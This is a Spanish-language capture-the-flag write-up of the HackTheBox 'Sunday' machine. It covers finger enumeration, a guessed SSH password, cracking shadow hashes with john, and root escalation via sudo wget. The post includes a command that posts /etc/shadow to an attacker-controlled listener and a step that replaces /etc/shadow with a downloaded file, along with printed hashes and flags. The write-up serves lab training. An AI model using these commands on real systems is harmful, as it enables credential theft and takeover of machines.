Red Orbita
Inicio Linux & Systems Networks & Infrastructure Cybersecurity Cloud & DevOps SIEM & Monitoring DFIR & Threat Intel Development & Other Todas las categorias Herramientas

HackTheBox – Sunday Writeup

30 septiembre, 2018Cybersecurity rokitoh
HackTheBox – Sunday Writeup

Tabla de contenidos

Saunday 00001

Escaneamos todos los puertos mediante nmap:

bash
nmap -A -T5 -Pn -p 10000-20000 10.10.10.76
PORT STATE SERVICE VERSION

79/tcp open finger

111/tcp open rpcbind

22022/tcp open ssh SunSSH 1.3 (protocol 2.0)

| ssh-hostkey:

| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)

|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)

33381/tcp open smserverd 1 (RPC #100155)60722/tcp open smserverd 1 (RPC #100155

Con el comando finger vemos los usuarios que se encuentran conectados:

bash
finger @10.10.10.76

Login Name TTY Idle When Where

sunny sunny pts/2 28 Sat 09:25 10.10.12.233

sunny sunny pts/3 Sat 08:41 10.10.12.220

sunny sunny pts/4 1:15 Sat 08:42 10.10.12.196

sunny sunny pts/5 50 Sat 09:04 10.10.12.27

sammy sammy pts/6 4 Sat 09:50 10.10.14.215

sunny sunny pts/7 30 Sat 09:29 10.10.12.233

sammy sammy pts/8 Sat 09:44 10.10.13.57

sunny sunny pts/9 Sat 09:57 10.10.12.163

Intentamos acceder mediante el usuario sunny por el puerto 22022, probando las tipicas contraseñas por defecto y vemos que la contraseña es igual que el nombre de la maquina: sunday

bash
ssh -p 22022 sunny@10.10.10.76

Buscamos el fichero user.txt

text
sanny@sunday:/export/home$ find /export/home -name «user.txt»

Comprobamos que con el usuario sanny no tenemos permisos para poder leer el contenido del archivo.

text
./sammy/Desktop/user.txt

Tras enumerar y ver todos los directorios encontramos un file system de /backup en el que se encuentra un backup del fichero shadow

bash
sammy@sunday:~$ cat /backup/shadow.backup

mysql:NP:::::::

openldap:*LK*:::::::

webservd:*LK*:::::::

postgres:NP:::::::

svctag:*LK*:6445::::::

nobody:*LK*:6445::::::

noaccess:*LK*:6445::::::

nobody4:*LK*:6445::::::

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

sammy@sunday:~$

Mediante fuerza bruta intentamos obtener la contraseña

text
john –wordlist=rockyou.txt shadow

Loaded 1 password hash (crypt, generic crypt(3) [?/64])

Press ‘q’ or Ctrl-C to abort, almost any other key for status

cooldude! (sammy)

1g 0:00:09:05 100% 0.001834g/s 373.5p/s 373.5c/s 373.5C/s coolpeople..coliflor

Use the «–show» option to display all of the cracked passwords reliably

Session completed

Tras logarnos mediante la contraseña cooldude! con el usuario sammy podemos acceder al flag

bash
su – sammy

cat user.txt

a3d9498027ca5187ba1793943ee8a598

Escalar privilegios:

vemos que sammy tiene permisos en el wget medainte sudo

bash
sudo -l

User sammy may run the following commands on this host:

(root) NOPASSWD: /usr/bin/wget

intentamos descargarnos el archivo shadow

Dejamos escuchando una sesion:

text
nc -lvp 8000

mediante el comando wget descargamos el fichero shadow a nuestra maquina.

bash
sudo wget –post-file=/etc/shadow 10.10.12.220:8000

Si nos fijamos en la cosola que hemos dejado escuchando nos encontramos el shadow del servidor.

text
root:$5$WVmHMduo$nI.KTRbAaUv1ZgzaGiHhpA2RNdoo3aMDgPBL25FZcoD:14146::::::

daemon:NP:6445::::::

bin:NP:6445::::::

sys:NP:6445::::::

adm:NP:6445::::::

lp:NP:6445::::::

uucp:NP:6445::::::

nuucp:NP:6445::::::

dladm:*LK*:::::::

smmsp:NP:6445::::::

listen:*LK*:::::::

gdm:*LK*:::::::

zfssnap:NP:::::::

xvm:*LK*:6445::::::

mysql:NP:::::::

openldap:*LK*:::::::

webservd:*LK*:::::::

postgres:NP:::::::

svctag:*LK*:6445::::::

nobody:*LK*:6445::::::

noaccess:*LK*:6445::::::

nobody4:*LK*:6445::::::

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Creamos un fichero nuevo shadow con la contraseña de root cambiada

text
root:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:14146::::::

daemon:NP:6445::::::

bin:NP:6445::::::

sys:NP:6445::::::

adm:NP:6445::::::

lp:NP:6445::::::

uucp:NP:6445::::::

nuucp:NP:6445::::::

dladm:*LK*:::::::

smmsp:NP:6445::::::

listen:*LK*:::::::

gdm:*LK*:::::::

zfssnap:NP:::::::

xvm:*LK*:6445::::::

mysql:NP:::::::

openldap:*LK*:::::::

webservd:*LK*:::::::

postgres:NP:::::::

svctag:*LK*:6445::::::

nobody:*LK*:6445::::::

noaccess:*LK*:6445::::::

nobody4:*LK*:6445::::::

sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::

sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::

Configuramos un servidor http mediante python

text
python -m SimpleHTTPServer 8080

Descargamos desde el servidor el fichero creado anteriormente

bash
sudo wget http://10.10.12.220:8080/shadow -O /etc/shadow

Ahora mediante su – intentamos acceder como root (contraseña test) con el shadow generado.

bash
sammy@sunday:~$ su –

Password:

Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008

You have new mail.

root@sunday:~# id

uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)

Dentro del home de root encontramos el flag

cat /root/root.txt
fb40fab61d99d37536daeec0d97af9b8

:wq!

Articulos relacionados

Comentarios